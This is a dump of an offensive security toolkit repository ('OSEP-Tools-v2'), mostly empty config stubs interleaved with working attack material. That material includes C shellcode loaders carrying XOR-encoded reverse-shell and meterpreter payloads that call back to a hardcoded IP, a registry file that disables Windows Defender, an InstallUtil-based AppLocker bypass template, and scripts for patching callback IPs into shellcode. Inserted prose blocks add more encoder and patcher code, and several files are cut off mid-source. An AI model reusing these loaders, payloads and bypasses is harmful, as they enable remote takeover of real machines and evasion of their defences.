/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/bin/x64/Release/Microsoft.PowerShell.ConsoleHost.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/bin/x64/Release/Microsoft.PowerShell.ConsoleHost.dll
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/AppLocker_Bypass/altBypass/obj/Release/altbypass.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/obj/Release/altbypass.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/System.Management.Automation.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/System.Management.Automation.dll
--------------------------------------------------------------------------------
/Misc/MiniDump/App.config:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 
4 | 
5 | 
6 | 
--------------------------------------------------------------------------------
/Misc/PSLessExec/App.config:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 
4 | 
5 | 
6 | 
--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/psbypass/obj/Release/examine.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/obj/Release/examine.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/shakeitoff.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/shakeitoff.write.1u.tlog
--------------------------------------------------------------------------------
/Active_Directory/sql/App.config:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 
4 | 
5 | 
6 | 
--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/Microsoft.PowerShell.ConsoleHost.dll:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/Microsoft.PowerShell.ConsoleHost.dll -------------------------------------------------------------------------------- /Loaders_Disk/clhollow/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Loaders_Disk/clinject/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Loaders_Disk/clrunner/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/exe/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/test/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/Server/sqlite3/storage.ide-wal: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/Builder/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/service/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active_Directory/sql/bin/Debug/sql.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/shakeitoff.lastbuildstate: 
-------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|C:\Users\User\shakeitoff\| 3 | -------------------------------------------------------------------------------- /Active_Directory/sql/bin/x64/Release/sql.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/bin/Release/altbypass.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/bin/x64/Release/psbypass.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/bin/x64/Release/altbypass.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/psbypass.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 
--------------------------------------------------------------------------------
/Privilege_Escalation/PrintSpoofer.NET/bin/x64/Release/PrintSpoofer.exe.config:
--------------------------------------------------------------------------------
1 | 2 | 3 | 4 | 5 | 6 |
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.exe.recipe:
--------------------------------------------------------------------------------
1 | 2 | 3 | 4 | 5 | C:\Users\User\shakeitoff\x64\Release\shakeitoff.exe 6 | 7 | 8 | 9 | 10 | 11 |
--------------------------------------------------------------------------------
/Loaders_Disk/formatters/formatshellcode.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
# Flatten msfvenom '-f csharp' output into a single "0x..,0x..,..." line for Builder.exe:
# the first line ("byte[] buf = new byte[N] {") is dropped and the trailing " };" is stripped.
import sys
if len(sys.argv) != 2:
    sys.exit("usage: python3 formatshellcode.py <csharp_shellcode_file>")
var = ""
array = []
with open(sys.argv[1]) as f:
    for line in f:
        array.append(line)
for line in array:
    if line == array[0]:
        pass
    elif line == array[-1]:
        line = line.strip(" };\n")
        var = var + line
    else:
        line = line.strip("\n")
        var = var + line

print(var)
--------------------------------------------------------------------------------
/Other/disable_realtime_protection.reg:
--------------------------------------------------------------------------------
Windows Registry Editor Version 5.00

; Defender ignores these policy values while Tamper Protection is enabled.
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableBehaviorMonitoring"=dword:00000001
"DisableOnAccessProtection"=dword:00000001
"DisableScanOnRealtimeEnable"=dword:00000001
--------------------------------------------------------------------------------
/Other/enable_realtime_protection.reg:
--------------------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableBehaviorMonitoring"=dword:00000000
"DisableOnAccessProtection"=dword:00000000
"DisableScanOnRealtimeEnable"=dword:00000000
--------------------------------------------------------------------------------
/Misc/Autos/PS-Cheatsheet.ps1:
--------------------------------------------------------------------------------
# get pid / proc name
$myId=[System.Diagnostics.Process]::GetCurrentProcess().Id
get-process | findstr $myId

# determine if 64-bit ps
[Environment]::Is64BitProcess

# determine if running in syswow64 (only set for a 32-bit process on 64-bit Windows)
$env:PROCESSOR_ARCHITEW6432 -eq 'AMD64'

# list hidden items in the semi-important dirs of the user home
Get-ChildItem -Recurse -Attributes Hidden .\Desktop\,.\Documents\,.\Downloads\

# Check current language mode (ConstrainedLanguage means CLM is on)
$ExecutionContext.SessionState.LanguageMode
--------------------------------------------------------------------------------
/Loaders_Disk/D_invoke/dll/Template.cs:
--------------------------------------------------------------------------------
using System;
using System.Linq;
using System.Text;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
using System.Security.Cryptography;
using System.Collections.Generic;
namespace dll
{
    [ComVisible(true)]
    public class Class1
    {

        public static void runner()
        {

        }

    }

}
--------------------------------------------------------------------------------
/payloads/AppLocker_Bypass/nonDN2J.hta:
--------------------------------------------------------------------------------
1 | 2 | 3 | 7 | 8 | 9 | 12 | 13 | 14 |
--------------------------------------------------------------------------------
/Loaders_Disk/formatters/README.md:
--------------------------------------------------------------------------------
# Formatters

Basic, quick-fix scripts that reformat shellcode into the form one of the other projects expects.

## ToC

| Application | Output | Notes |
| ----------- | ------ | ----- |
| `formatters/portip_eggs.py` | TXT | Python3 script to format C# shellcode output by msfvenom into the proper format for use with `Powerinject` & `Powerhollow` (LHOST/LPORT bytes replaced by egg markers) |
| `formatters/bin_to_vbappArray.py` | TXT | Python3 script to format raw `.bin` shellcode files into the proper format for use in VBA Macros |
| `formatters/formatshellcode.py` | TXT | Python3 script to format C# shellcode output by msfvenom into the proper format for use with `Builder.exe` |
--------------------------------------------------------------------------------
/Loaders_Disk/D_invoke/service/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Linq;
using System.Text;
using System.Diagnostics;
using System.ServiceProcess;
using System.Runtime.InteropServices;
using System.IO;
using System.Security.Cryptography;
using System.Collections.Generic;

namespace service
{
    static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        static void Main()
        {
            ServiceBase[] ServicesToRun;
            ServicesToRun = new ServiceBase[]
            {
                new Service1()
            };
            ServiceBase.Run(ServicesToRun);
        }
    }
}
--------------------------------------------------------------------------------
/Loaders_Disk/D_invoke/exe/Template.cs:
--------------------------------------------------------------------------------
using System;
using System.Linq;
using System.Text;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
using System.Security.Cryptography;
using System.Collections.Generic;

namespace exe
{
    class Program
    {

        public static void Main()
        {

        }

    }


    // Running the assembly through "InstallUtil.exe /U" invokes Uninstall(), which hands
    // control to Program.Main() from inside a signed Microsoft binary.
    [System.ComponentModel.RunInstaller(true)]
    public class Loader : System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            base.Uninstall(savedState);
            Program.Main();
        }
    }
}
--------------------------------------------------------------------------------
/Loaders_Disk/D_invoke/service/Template.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Linq;
using System.ServiceProcess;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
using System.IO;
using System.Security.Cryptography;

namespace service
{
    public partial class Service1 : ServiceBase
    {
        public Service1()
        {
            InitializeComponent();
        }

        protected override void OnStart(string[] args)
        {

        }

        protected override void OnStop()
        {
        }
    }

}
--------------------------------------------------------------------------------
/Loaders_Disk/bins/README.md:
--------------------------------------------------------------------------------
# Binaries

## ToC

| Application | Output | Notes |
| ----------- | ------ | ----- |
| `bins/x64_met_staged_reversetcp_inject.exe` | N/A | Command line args: IP PORT PROCESS_TO_INJECT(explorer) |
| `bins/x64_met_staged_reversetcp_hollow.exe` | N/A | Command line args: IP PORT PROCESS_TO_HOLLOW(c:\\windows\\system32\\svchost.exe) PPID_SPOOF(explorer) |
| `bins/x64_met_staged_reversehttps_inject.exe` | N/A | Command line args: IP PORT PROCESS_TO_INJECT(explorer) |
| `bins/x64_met_staged_reversehttps_hollow.exe` | N/A | Command line args: IP PORT PROCESS_TO_HOLLOW(c:\\windows\\system32\\svchost.exe) PPID_SPOOF(explorer) |


This directory just holds precompiled binaries created with the `clhollow` and `clinject` projects using `windows/x64/meterpreter/reverse_https` and `windows/x64/meterpreter/reverse_tcp` payloads.
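The formatters README and the `bins` README above describe the two halves of one scheme: `portip_eggs.py` swaps the LHOST/LPORT bytes in `msfvenom -f csharp` output for `0x11`/`0x22` egg markers, and the compiled loaders take IP and PORT on the command line and write the real values back before injecting. The script below is an added example of that round trip, not code from the repo: the shellcode is a constructed 16-byte stand-in carrying only the `sockaddr_in` layout (AF_INET, port, address in network order, as the x64 reverse_tcp stager embeds it), and `patch_eggs()` is how I would write the loader-side step, not the project's own implementation. Unlike `str.replace`, it refuses to mark a byte pattern that occurs more than once, which is the check you want before trusting a patched stager.

```python
#!/usr/bin/env python3
# Added example: mark and patch the IP/port "eggs" in msfvenom '-f csharp' shellcode.
import re
import socket
import struct

IP_EGG = b"\x11\x11\x11\x11"   # markers portip_eggs.py writes
PORT_EGG = b"\x22\x22"

# Constructed stand-in (NOT real shellcode): filler bytes around a sockaddr_in for
# 192.168.45.191:443 (AF_INET 0x0002 little-endian, then port and address in network order).
SAMPLE_CSHARP = """byte[] buf = new byte[16] {
0xfc,0x48,0x83,0xe4,0xf0,0x49,0xbe,0x02,0x00,0x01,0xbb,0xc0,0xa8,0x2d,
0xbf,0xc3 };"""


def parse_csharp_shellcode(text):
    """Bytes from 'byte[] buf = new byte[N] { 0x.., ... };' (the text formatshellcode.py flattens)."""
    body = text[text.index("{") + 1:text.rindex("}")]
    data = bytes(int(tok, 16) for tok in re.findall(r"0x([0-9a-fA-F]{2})", body))
    declared = int(re.search(r"new byte\[(\d+)\]", text).group(1))
    if len(data) != declared:
        raise ValueError("declared length %d but parsed %d bytes" % (declared, len(data)))
    return data


def ip_port_bytes(ip, port):
    """Network-order encodings: how sockaddr_in carries them inside the stager."""
    return socket.inet_aton(ip), struct.pack(">H", port)


def mark_eggs(text, ip, port):
    """Replace the LHOST/LPORT bytes with the egg markers; refuse ambiguous matches."""
    sc = parse_csharp_shellcode(text)
    ip_b, port_b = ip_port_bytes(ip, port)
    if sc.count(ip_b) != 1 or sc.count(port_b) != 1:
        raise ValueError("LHOST/LPORT bytes must occur exactly once (str.replace would hit every copy)")
    ip_off, port_off = sc.index(ip_b), sc.index(port_b)
    out = bytearray(sc)
    out[ip_off:ip_off + 4] = IP_EGG
    out[port_off:port_off + 2] = PORT_EGG
    return bytes(out)


def patch_eggs(marked, ip, port):
    """Loader-side step: write the run-time IP and PORT over the markers.
    Both offsets are located before anything is written, so a port such as 0x1111 or an
    address such as 34.34.x.x cannot manufacture a second marker mid-patch."""
    ip_b, port_b = ip_port_bytes(ip, port)
    ip_off, port_off = marked.index(IP_EGG), marked.index(PORT_EGG)
    out = bytearray(marked)
    out[ip_off:ip_off + 4] = ip_b
    out[port_off:port_off + 2] = port_b
    return bytes(out)


def to_flat_csharp(sc):
    """The one-line '0x..,0x..' form the formatter scripts print."""
    return ",".join("0x%02x" % b for b in sc)


if __name__ == "__main__":
    marked = mark_eggs(SAMPLE_CSHARP, "192.168.45.191", 443)
    print(to_flat_csharp(marked))
    print(to_flat_csharp(patch_eggs(marked, "10.10.10.5", 4444)))
```

Generating the stager with a distinctive LHOST/LPORT pair (not 0.0.0.1 or port 1) keeps the two patterns unique inside a few hundred bytes of shellcode; the `ValueError` is what tells you when they are not.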
--------------------------------------------------------------------------------
/Linux/Linux_Shellcode_Loaders/simpleLoader.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// To compile:
// gcc -o simpleLoader simpleLoader.c -z execstack

// XOR-encoded 'linux/x64/shell_reverse_tcp' payload (key: 0xfa)
unsigned char buf[] = "\x90\xD3\xA2\x63\x90\xF8\xA5\x90\xFB\xA4\xF5\xFF\xB2\x6D\xB2\x43\xF8\xFA\xFA\xAA\x3A\x52\xCB\xB9\xAB\xB2\x73\x1C\x90\xEA\xA0\x90\xD0\xA2\xF5\xFF\x90\xF9\xA4\xB2\x05\x34\x90\xDB\xA2\xF5\xFF\x8F\x0C\x90\xC1\xA2\x63\xB2\x41\xD5\x98\x93\x94\xD5\x89\x92\xFA\xA9\xB2\x73\x1D\xA8\xAD\xB2\x73\x1C\xF5\xFF\xFA";

int main (int argc, char **argv)
{
    int key = 250;
    int buf_len = (int) sizeof(buf);

    // Decode the payload (XOR is its own inverse; sizeof includes the trailing NUL,
    // which decodes from the final \xFA back to 0x00)
    for (int i=0; i<buf_len; i++) {
        buf[i] = buf[i] ^ key;
    }

    // Jump into the decoded buffer. buf lives in .data, so this relies on
    // -z execstack making non-stack data executable too; newer x86-64 kernels
    // no longer do that, in which case copy buf into an RWX mmap() region first.
    int (*ret)() = (int(*)())buf;
    ret();
    return 0;
}
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/src/FileOpLock.h:
--------------------------------------------------------------------------------
#pragma once

#include <windows.h>
#include <winioctl.h>
#include <string>

// Requests an oplock on a file/directory and runs a callback when another
// process tries to open it (the timing primitive the exploit hangs on).
class FileOpLock
{
public:
    typedef void(*UserCallback)();

    static FileOpLock* CreateLock(const std::wstring& name, FileOpLock::UserCallback cb, HANDLE p_provided = INVALID_HANDLE_VALUE);
    void WaitForLock(UINT Timeout);

    ~FileOpLock();
private:

    HANDLE g_hFile;
    OVERLAPPED g_o;
    REQUEST_OPLOCK_INPUT_BUFFER g_inputBuffer;
    REQUEST_OPLOCK_OUTPUT_BUFFER g_outputBuffer;
    HANDLE g_hLockCompleted;
    PTP_WAIT g_wait;
    UserCallback _cb;

    FileOpLock(UserCallback cb);

    static void CALLBACK WaitCallback(PTP_CALLBACK_INSTANCE Instance,
        PVOID Parameter, PTP_WAIT Wait,
        TP_WAIT_RESULT WaitResult);

    void DoWaitCallback();

    bool BeginLock(const std::wstring& name, HANDLE p_provided = INVALID_HANDLE_VALUE);

};

--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/src/exploit.h:
--------------------------------------------------------------------------------
#pragma once

#include <windows.h>
#include <string>

class Exploit
{
public:
    Exploit(const std::string& p_msi_path, const std::string& p_target_path, const std::string& p_install_path);
    ~Exploit();

    void load_ntdll();
    void exploit_thread();
    void callback_one();
    void callback_two();
    bool create_temp_files();

private:

    const std::string m_msi_path;
    const std::string m_target_path;
    const std::string m_tmp_base_path;
    std::string m_cb_directory;
    HANDLE m_cb_directory_handle;
    const std::string m_tmp_inner_path;
    const std::string m_tmp_inner_tmp;
    const std::string m_tmp_outter_file;
    const std::string m_tmp_lock_file;
    std::string m_rbf_path;
    std::string m_rbf_name;
    HANDLE m_rbf_handle;
    HANDLE m_lock_handle;
    HANDLE m_inner_shake_directory_handle;
};
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/src/winglue.h:
--------------------------------------------------------------------------------
#pragma once

#include <windows.h>

// Layout of the data behind FSCTL_GET/SET_REPARSE_POINT. It is only declared in
// the WDK's ntifs.h, so user-mode code that builds junctions/symlinks defines it itself.
typedef struct _REPARSE_DATA_BUFFER {
    ULONG ReparseTag;
    USHORT ReparseDataLength;
    USHORT Reserved;
    union {
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            ULONG Flags;
            WCHAR PathBuffer[1];
        } SymbolicLinkReparseBuffer;
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            WCHAR PathBuffer[1];
        } MountPointReparseBuffer;
        struct {
            UCHAR DataBuffer[1];
        } GenericReparseBuffer;
    } DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;
#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)
--------------------------------------------------------------------------------
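The Linux loaders above (`simpleLoader.c`, and `sharedLibrary_LD_LIBRARY_PATH.c` further down) expect their `buf[]` already transformed: single-byte XOR with `0xfa`, or every byte shifted up by 13 (the "ROT13" variant). `simpleXORencoder.c` below produces the former in C; this is an added Python encoder, not part of the repo, that emits both transforms in the exact `"\xNN"` literal form the loaders paste in, plus the `byte[] buf` form the C# wrappers and formatters use. The sample input is constructed from the first twelve decoded bytes of the page's own payload (`push 0x29; pop rax; cdq; ...`), not a complete shellcode; the parser `from_c_literal()` lets you check a loader's buffer against the encoder's output.

```python
#!/usr/bin/env python3
# Added example: produce the encoded buf[] that the Linux loaders on this page decode.

XOR_KEY = 0xfa   # simpleLoader.c / simpleXORencoder.c
SHIFT = 13       # sharedLibrary_LD_LIBRARY_PATH.c ("ROT13" on bytes: buf[i] - 13 undoes it)

# Constructed sample: the first bytes of the page's decoded payload (socket syscall
# prologue), not a complete shellcode.
SAMPLE = bytes.fromhex("6a2958996a025f6a015e0f05")


def xor_encode(data, key=XOR_KEY):
    """Single-byte XOR; applying it twice restores the input, which is all the loader's loop does."""
    return bytes(b ^ key for b in data)


def shift_encode(data, shift=SHIFT):
    """Add a constant to each byte mod 256 (0xff + 13 wraps to 0x0c, as char arithmetic does in C)."""
    return bytes((b + shift) & 0xff for b in data)


def shift_decode(data, shift=SHIFT):
    return bytes((b - shift) & 0xff for b in data)


def to_c_literal(data):
    """Upper-case \\xNN escapes for 'unsigned char buf[] = "...";', the loaders' format."""
    return '"' + "".join("\\x%02X" % b for b in data) + '"'


def from_c_literal(literal):
    """Inverse: parse a "\\x..\\x.." literal (e.g. copied from a loader) back into bytes."""
    return bytes(int(h, 16) for h in literal.strip('"').split("\\x") if h)


def to_csharp_array(data):
    """'byte[] buf = new byte[N] {...};' for the C# wrappers and the formatter scripts."""
    return "byte[] buf = new byte[%d] {%s};" % (len(data), ",".join("0x%02x" % b for b in data))


if __name__ == "__main__":
    print("XOR  :", to_c_literal(xor_encode(SAMPLE)))
    print("SHIFT:", to_c_literal(shift_encode(SAMPLE)))
    print(to_csharp_array(xor_encode(SAMPLE)))
```

Run it and compare the first bytes of the XOR line with `simpleLoader.c` (`\x90\xD3\xA2\x63...`) and of the SHIFT line with `sharedLibrary_LD_LIBRARY_PATH.c` (`\x77\x36\x65\xa6...`): both loaders decode to the same `\x6a\x29\x58\x99` prologue.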
/Loaders_Disk/formatters/portip_eggs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import sys 3 | var = "" 4 | array = [] 5 | if len(sys.argv) == 1 or len(sys.argv) != 4: 6 | sys.exit("usage: python3 portip_eggs.py ") 7 | with open(sys.argv[1]) as f: 8 | for line in f: 9 | array.append(line) 10 | for line in array: 11 | if line == array[0]: 12 | pass 13 | elif line == array[-1]: 14 | line = line.strip(" };\n") 15 | var = var + line 16 | else: 17 | line = line.strip("\n") 18 | var = var + line 19 | #convert sysargv2 (ip) in hex 20 | iparray = sys.argv[2].split(".") 21 | x=0 22 | for i in iparray: 23 | temp = hex(int(i)) 24 | if len(temp) == 3: 25 | temp = "0x0" + temp[-1] 26 | iparray[x] = temp 27 | x = x + 1 28 | ipbytes = ",".join(iparray) 29 | 30 | #convert sysargv3 (port) in hex 31 | port = hex(int(sys.argv[3])) 32 | firstbyte = "0x00" 33 | if len(port) > 4: 34 | if len(port) == 5: 35 | firstbyte = "0x0" + port[2] 36 | else: 37 | firstbyte = "0x" + port[2] + port[3] 38 | secondbyte = "0x" + port[-2] + port[-1] 39 | portbytes = firstbyte + "," + secondbyte 40 | 41 | var = var.replace(ipbytes,"0x11,0x11,0x11,0x11").replace(portbytes,"0x22,0x22") 42 | print(var) 43 | -------------------------------------------------------------------------------- /Linux/Linux_Shellcode_Loaders/simpleXORencoder.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // To compile: 6 | // gcc simpleXORencoder.c -o simpleXORencoder 7 | 8 | // msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.45.191 LPORT=443 -f c 9 | unsigned char buf[] = 10 | "\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9" 11 | "\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51" 12 | "\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01" 13 | "\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00" 14 | 
"\x01\xbb\xc0\xa8\x2d\xbf\x51\x48\x89\xe6\x6a\x10\x5a\x6a" 15 | "\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74" 16 | "\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31" 17 | "\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58" 18 | "\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0" 19 | "\x78\xed\xff\xe6"; 20 | 21 | int main (int argc, char **argv) 22 | { 23 | int key = 250; 24 | int buf_len = (int) sizeof(buf); 25 | 26 | printf("XOR payload (key 0xfa):\n"); 27 | 28 | for(int i=0; i 7 | /// Required designer variable. 8 | /// 9 | private System.ComponentModel.IContainer components = null; 10 | 11 | /// 12 | /// Clean up any resources being used. 13 | /// 14 | /// true if managed resources should be disposed; otherwise, false. 15 | protected override void Dispose(bool disposing) 16 | { 17 | if (disposing && (components != null)) 18 | { 19 | components.Dispose(); 20 | } 21 | base.Dispose(disposing); 22 | } 23 | 24 | #region Component Designer generated code 25 | 26 | /// 27 | /// Required method for Designer support - do not modify 28 | /// the contents of this method with the code editor. 29 | /// 30 | private void InitializeComponent() 31 | { 32 | components = new System.ComponentModel.Container(); 33 | this.ServiceName = "Service1"; 34 | } 35 | 36 | #endregion 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /Linux/Linux_Shellcode_Loaders/sharedLibrary_LD_LIBRARY_PATH.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | // Compile as follows 8 | //gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_LIBRARY_PATH.o sharedLibrary_LD_LIBRARY_PATH.c 9 | //gcc -shared -o sharedLibrary_LD_LIBRARY_PATH.so sharedLibrary_LD_LIBRARY_PATH.o -ldl 10 | 11 | static void runmahpayload() __attribute__((constructor)); 12 | 13 | int gpgrt_onclose; 14 | // [...output from readelf here...] 
